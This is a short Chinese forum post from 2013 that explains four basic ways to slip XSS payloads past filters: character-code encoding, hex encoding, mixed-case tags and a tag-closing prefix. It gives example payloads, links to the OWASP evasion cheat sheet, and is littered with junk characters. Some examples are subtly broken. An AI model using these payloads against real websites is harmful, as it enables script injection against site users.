四种超级基础的绕过方法。9 `0 B! u( M1 |; |% F: A9 K: f
1.转换为ASCII码# b7 l7 X0 n" o+ n0 k
例子:原脚本为<script>alert(‘I love F4ck’)</script >+ e8 w# ]1 [$ g) o& ~1 a: q
通过转换,变成:6 U* n9 Q8 Z, G! l0 V, i
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
" C7 W" W" D" U; S/ D+ C$ W$ J 9 i$ Y$ j4 w$ `; e0 L& H
2.转换为HEX(十六进制)
0 p5 d5 E7 N+ g1 I0 f" u0 _3 A例子:原脚本为<script>alert(‘I love F4ck’)</script>+ y6 p* O; @( {1 @/ P. V
通过转换,变成:. s0 C; d8 b' C8 g) J3 A' U
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e
) v: W, O: ^# N; K" Q
9 P& g& F: {; V @4 z3.转换脚本的大小写
1 y7 H2 Q# T4 O8 J. C, [# f, Q& g8 x# F例子:原脚本为<script>alert(‘I love F4ck’)</script>
. E* ]6 B/ j; @* B8 f2 i转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT># {! R" s* q/ C( Q
; o$ G& f7 \; G2 f& V4.增加闭合标记”>5 u$ }7 @% a2 l) W$ C8 B
例子:原脚本为<script>alert(‘I love F4ck’)</script>
7 N' p) ]* Q+ s0 p& t8 f转换为:”><script>alert(‘I love F4ck’)</script>
' z' Q0 Y) e8 b7 X* D更详细绕过技术请参考此网页; _* a7 j8 k1 t: ?+ m4 E T& H4 A
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
: U) m/ l6 L% m4 H) [$ p # G- {) e, K( O; F% w& H
转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对